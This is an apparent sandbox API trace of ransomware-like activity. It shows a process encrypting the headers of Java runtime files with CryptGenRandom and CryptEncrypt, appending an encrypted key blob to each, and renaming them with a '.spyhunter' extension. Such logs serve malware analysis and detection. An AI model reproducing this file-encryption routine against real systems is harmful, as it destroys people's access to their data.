lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.414] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.414] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.414] GetProcessHeap () returned 0x2c0000 [0174.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.414] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.414] WriteFile (in: hFile=0xa0, lpBuffer=0x270e4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x270e4f4*, lpNumberOfBytesWritten=0x270e4b4*=0x4, lpOverlapped=0x0) returned 1 [0174.445] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4b4*=0x30, lpOverlapped=0x0) returned 1 [0174.445] CloseHandle (hObject=0xa0) returned 1 [0174.462] GetProcessHeap () returned 0x2c0000 [0174.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.462] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll.spyhunter") returned 62 [0174.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxslt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxslt.dll.spyhunter")) returned 1 [0174.467] GetProcessHeap () returned 0x2c0000 [0174.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.468] GetProcessHeap () returned 0x2c0000 [0174.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.468] GetProcessHeap () returned 0x2c0000 [0174.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2db0 | out: hHeap=0x2c0000) returned 1 [0174.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4f8 | out: pbBuffer=0x270e4f8) returned 1 [0174.468] GetProcessHeap () returned 0x2c0000 [0174.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4f0*=0x30) returned 1 [0174.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.470] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe") returned 49 [0174.470] StrStrW (lpFirst="ktab.exe", lpSrch=".txt") returned 0x0 [0174.470] GetProcessHeap () returned 0x2c0000 [0174.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.470] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.494] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.494] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.495] GetProcessHeap () returned 0x2c0000 [0174.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.495] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.495] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x270e4f4*, lpNumberOfBytesWritten=0x270e4b4*=0x4, lpOverlapped=0x0) returned 1 [0174.497] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4b4*=0x30, lpOverlapped=0x0) returned 1 [0174.497] CloseHandle (hObject=0x9c) returned 1 [0174.497] GetProcessHeap () returned 0x2c0000 [0174.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.497] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe.spyhunter") returned 59 [0174.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe.spyhunter")) returned 1 [0174.498] GetProcessHeap () returned 0x2c0000 [0174.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.499] GetProcessHeap () returned 0x2c0000 [0174.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.499] GetProcessHeap () returned 0x2c0000 [0174.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c216d0 | out: hHeap=0x2c0000) returned 1 [0174.499] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4f0 | out: pbBuffer=0x270e4f0) returned 1 [0174.499] GetProcessHeap () returned 0x2c0000 [0174.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.499] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4e8*=0x30) returned 1 [0174.499] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.503] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll") returned 49 [0174.503] StrStrW (lpFirst="kcms.dll", lpSrch=".txt") returned 0x0 [0174.503] GetProcessHeap () returned 0x2c0000 [0174.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.504] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.520] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.520] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.520] GetProcessHeap () returned 0x2c0000 [0174.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.520] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.520] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x270e4ec*, lpNumberOfBytesWritten=0x270e4ac*=0x4, lpOverlapped=0x0) returned 1 [0174.537] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4ac*=0x30, lpOverlapped=0x0) returned 1 [0174.537] CloseHandle (hObject=0x9c) returned 1 [0174.538] GetProcessHeap () returned 0x2c0000 [0174.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0174.538] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll.spyhunter") returned 59 [0174.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kcms.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kcms.dll.spyhunter")) returned 1 [0174.539] GetProcessHeap () returned 0x2c0000 [0174.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0174.539] GetProcessHeap () returned 0x2c0000 [0174.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.539] GetProcessHeap () returned 0x2c0000 [0174.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c214c0 | out: hHeap=0x2c0000) returned 1 [0174.540] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4f0 | out: pbBuffer=0x270e4f0) returned 1 [0174.540] GetProcessHeap () returned 0x2c0000 [0174.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.540] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4e8*=0x30) returned 1 [0174.540] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.541] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe") returned 48 [0174.541] StrStrW (lpFirst="jqs.exe", lpSrch=".txt") returned 0x0 [0174.541] GetProcessHeap () returned 0x2c0000 [0174.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.541] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.544] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.544] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.544] GetProcessHeap () returned 0x2c0000 [0174.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.544] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.544] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x270e4ec*, lpNumberOfBytesWritten=0x270e4ac*=0x4, lpOverlapped=0x0) returned 1 [0174.545] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4ac*=0x30, lpOverlapped=0x0) returned 1 [0174.545] CloseHandle (hObject=0x9c) returned 1 [0174.545] GetProcessHeap () returned 0x2c0000 [0174.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0174.546] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe.spyhunter") returned 58 [0174.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe.spyhunter")) returned 1 [0174.547] GetProcessHeap () returned 0x2c0000 [0174.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0174.547] GetProcessHeap () returned 0x2c0000 [0174.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.547] GetProcessHeap () returned 0x2c0000 [0174.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c212b0 | out: hHeap=0x2c0000) returned 1 [0174.547] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4e8 | out: pbBuffer=0x270e4e8) returned 1 [0174.548] GetProcessHeap () returned 0x2c0000 [0174.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4e0*=0x30) returned 1 [0174.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpishare.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.549] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll") returned 53 [0174.549] StrStrW (lpFirst="jpishare.dll", lpSrch=".txt") returned 0x0 [0174.549] GetProcessHeap () returned 0x2c0000 [0174.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.549] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0174.551] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.551] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0174.551] GetProcessHeap () returned 0x2c0000 [0174.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.551] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.551] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x270e4e4*, lpNumberOfBytesWritten=0x270e4a4*=0x4, lpOverlapped=0x0) returned 1 [0174.561] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4a4*=0x30, lpOverlapped=0x0) returned 1 [0174.573] CloseHandle (hObject=0x9c) returned 1 [0174.573] GetProcessHeap () returned 0x2c0000 [0174.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0174.573] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll.spyhunter") returned 63 [0174.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpishare.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpishare.dll.spyhunter")) returned 1 [0174.575] GetProcessHeap () returned 0x2c0000 [0174.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0174.575] GetProcessHeap () returned 0x2c0000 [0174.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.575] GetProcessHeap () returned 0x2c0000 [0174.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2ad0 | out: hHeap=0x2c0000) returned 1 [0174.575] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4e8 | out: pbBuffer=0x270e4e8) returned 1 [0174.575] GetProcessHeap () returned 0x2c0000 [0174.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.575] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4e0*=0x30) returned 1 [0174.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpinscp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.578] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll") returned 52 [0174.578] StrStrW (lpFirst="jpinscp.dll", lpSrch=".txt") returned 0x0 [0174.578] GetProcessHeap () returned 0x2c0000 [0174.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.578] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0174.635] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.635] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0174.635] GetProcessHeap () returned 0x2c0000 [0174.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.635] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.635] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x270e4e4*, lpNumberOfBytesWritten=0x270e4a4*=0x4, lpOverlapped=0x0) returned 1 [0174.674] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4a4*=0x30, lpOverlapped=0x0) returned 1 [0174.674] CloseHandle (hObject=0x9c) returned 1 [0174.674] GetProcessHeap () returned 0x2c0000 [0174.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.675] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll.spyhunter") returned 62 [0174.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpinscp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpinscp.dll.spyhunter")) returned 1 [0174.677] GetProcessHeap () returned 0x2c0000 [0174.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.678] GetProcessHeap () returned 0x2c0000 [0174.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.678] GetProcessHeap () returned 0x2c0000 [0174.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2a18 | out: hHeap=0x2c0000) returned 1 [0174.678] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4e0 | out: pbBuffer=0x270e4e0) returned 1 [0174.678] GetProcessHeap () returned 0x2c0000 [0174.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4d8*=0x30) returned 1 [0174.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jli.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.680] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll") returned 48 [0174.680] StrStrW (lpFirst="jli.dll", lpSrch=".txt") returned 0x0 [0174.680] GetProcessHeap () returned 0x2c0000 [0174.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.680] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e49c*=0x2800, lpOverlapped=0x0) returned 1 [0174.735] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.735] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e49c*=0x2800, lpOverlapped=0x0) returned 1 [0174.735] GetProcessHeap () returned 0x2c0000 [0174.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.735] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.735] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x270e4dc*, lpNumberOfBytesWritten=0x270e49c*=0x4, lpOverlapped=0x0) returned 1 [0174.832] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e49c*=0x30, lpOverlapped=0x0) returned 1 [0174.832] CloseHandle (hObject=0x9c) returned 1 [0174.832] GetProcessHeap () returned 0x2c0000 [0174.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.832] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll.spyhunter") returned 58 [0174.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jli.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jli.dll.spyhunter")) returned 1 [0174.833] GetProcessHeap () returned 0x2c0000 [0174.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: 